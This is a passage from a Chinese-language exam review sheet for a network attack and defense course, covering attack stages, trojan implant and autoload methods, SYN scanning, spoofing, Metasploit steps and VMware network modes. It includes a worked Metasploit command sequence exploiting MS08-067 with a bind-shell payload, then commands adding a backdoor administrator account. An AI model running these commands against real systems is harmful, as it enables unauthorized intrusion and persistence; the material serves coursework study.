网络攻防期末复习.docVIP

填空 简答 综合 简述网络攻击的一般步骤 隐藏IP踩点扫描获得系统或管理员权限种植后门 简述5种攻击阶段使用的攻击方法 缓冲区溢出攻击 脚本程序漏洞攻击 口令攻击 错误及弱配置攻击 网络欺骗与劫持攻击 简述5种提权方式 社会工程学 漏洞溢出 口令破解 SQL注入 木马 简述木马攻击的一般步骤 答： 配置木马 传播木马 运行木马 信息泄露 建立连接 远程控制 木马分别有哪些植入技术和加载技术？ 主动植入：本地安装、远程安装（利用系统漏洞和第三方软件漏洞） 被动植入： 网页浏览植入 利用电子邮件植入 利用网络下载植入 利用即时通工具植入 与其它程序捆绑 利用移动存储设备植入 在Windows系统中木马程序的自动加载技术主要有： 修改系统文件 修改系统注册表 添加系统服务 修改文件打开关联属性 修改任务计划 修改组策略 利用系统自动运行的程序 修改启动文件夹 替换系统DLL 简述TCP SYN扫描的原理 Half open scan 在3次握手完成前终止连接。发SYN，如果收到RST，说明端口关闭。如果收到SYN ACK，说明端口开放，发送RST。 列举网络欺骗的一般方法 DNS欺骗 邮件欺骗 IP欺骗 arp欺骗 网络钓鱼（web欺骗） Metasploit 渗透测试步骤 1. 创建项目 2. 发现设备 3. 获取对主机的访问权限 4. 控制会话 5. 从目标主机收集证据 6. 清除会话 7. 生成报告 使用Metasploit 的某攻击过程如下，简述各步骤的主要功能。 search ms08_067 use windows/smb/ms08_067_netapi show payloads set PAYLOAD windows/shell_bind_tcp show options set RHOST 192.168.1.108 Exploit 溢出成功后 Ipconfig /all Net user abc 123 /add Net localgroup administrators abc /add 常用扫描工具的主要功能 运行在VMware虚拟机软件上操作系统的网络连接方式有三种 VMWare提供了三种工作模式，它们是bridged(桥接模式)、NAT(网络地址转换模式)和host-only(主机模式)。要想在网络管理和维护中合理应用它们，你就应该先了解一下这三种工作模式。 　　1.bridged(桥接模式) 　　在这种模式下，VMWare虚拟出来的操作系统就像是局域网中的一台独立的主机，它可以访问网内任何一台机器。在桥接模式下，你需要手工为虚拟系统配置IP地址、子网掩码，而且还要和宿主机器处于同一网段，这样虚拟系统才能和宿主机器进行通信。同时，由于这个虚拟系统是局域网中的一个独立的主机系统，那么就可以手工配置它的TCP/IP配置信息，以实现通过局域网的网关或路由器访问互联网。 　　使用桥接模式的虚拟系统和宿主机器的关系，就像连接在同一个Hub上的两台电脑。想让它们相互通讯，你就需要为虚拟系统配置IP地址和子网掩码，否则就无法通信。 　　如果你想利用VMWare在局域网内新建一个虚拟服务器，为局域网用户提供网络服务，就应该选择桥接模式。 　　2.host-only(主机模式) 　　在某些特殊的网络调试环境中，要求将真实环境和虚拟环境隔离开，这时你就可采用host-only模式。在host-only模式中，所有的虚拟系统是可以相互通信的，但虚拟系统和真实的网络是被隔离开的。 　　提示:在host-only模式下，虚拟系统和宿主机器系统是可以相互通信的，相当于这两台机器通过双绞线互连。 　　在host-only模式下，虚拟系统的TCP/IP配置信息(如IP地址、网关地址、DNS服务器等)，都是由VMnet1(host-only)虚拟网络的DHCP服务器来动态分配的。 　　如果你想利用VMWare创建一个与网内其他机器相隔离的虚拟系统，进行某些特殊的网络调试工作，可以选择host-only模式。 　　3.NAT(网络地址转换模式) 　　使用NAT模式，就是让虚拟系统借助NAT(网络地址转换)功能，通过宿主机器所在的网络来访问公网。也就是说，使用NAT模式可以实现在虚拟系统里访问互联网。NAT模式下的虚拟系统的TCP/IP配置信息是由VMnet8(NAT)虚拟网络的DHCP服务器提供的，无法进行手工修改，因此虚拟系统也就无法和本局域网中的其他真实主机进行通讯。采用NAT模式最大的优势是虚拟系统接入互联网非常简单，你不需要进行任何其他的配置，只需要宿主机器能访问互联网即可。 　　如果你想利用VMWare安装一个新的虚拟系统，在虚拟系统中不用进行任何手工配置就能直接访问